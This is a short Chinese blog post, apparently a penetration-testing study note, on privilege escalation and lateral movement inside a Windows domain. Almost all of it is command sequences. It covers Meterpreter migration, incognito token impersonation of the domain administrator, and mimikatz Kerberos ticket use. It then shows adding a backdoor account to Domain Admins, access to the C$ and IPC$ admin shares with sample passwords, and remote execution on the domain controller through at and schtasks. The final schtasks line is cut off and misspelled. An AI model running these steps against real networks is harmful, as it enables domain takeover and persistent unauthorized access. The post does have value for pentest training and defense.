域内纵向移动和横向移动

网络安全 内网渗透 提权
网络安全
发布日期:   2022-03-31
文章字数:   382
阅读次数:  

纵向移动和横向移动

纵向移动

之前已经拿到system权限

ps    \\查看进程
migrate 1880  \\把自己进程迁移到1880里
use incognito
list_tokens -u   \\可以使用哪些用户
load mimikatz
kerberos_ticket_list
kerberos_ticket_use

管理员做过一些事情,但是没有退出

如果进入域管理员

getsystem
impersonate_token TEST1\Administrator  \\提权到域控管理员
add_user test2 tset123! -h 域控ip
add_group_user "domain admins" test2 -h 域控ip  \\扔进组里
shell
net group "domain admins" /domain

横向移动

入侵了一台普通的域内服务器之后,可以通过一些方法提权到system权限

ps
use incognito
list_tokens -u
impersonate_token TEST1\\Administrator
getuid

通过一些方法知道域的ip地址

可以映射网络驱动器

在文件夹里面
\\域控ip\c$
通过域控管理员直接连接

在cmd里

net use \\域控ip\c$ "test123!" /user:test2
net share
net use   建立管道
dir \\域控ip\c$
type \\域控ip\c$\this-is-dc.txt

当对方开了135和445端口的时候

net use \\域控ip\ipc$ "test123!" /user:test2

远程访问进程

tasklist /S 域控ip /U test2 /P test123!

进入session里面

shell
echo 'haha' > a.txt

然后在cmd里

copy a.txt \\域控ip\c$

也可以远程计划任务

at \\域控ip 9:51PM cmd.exe /c "ipconfig > c:/1.txt"

如果系统版本比较新

schtasks /create /s 域控ip /tn test1 /sc onstrat /tr c:/a.bat /ru system /
文章作者: Broken-year
文章链接: http://Broken-year.github.io/2022/03/31/move/
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 Broken-year !
网络安全 内网渗透 提权
  目录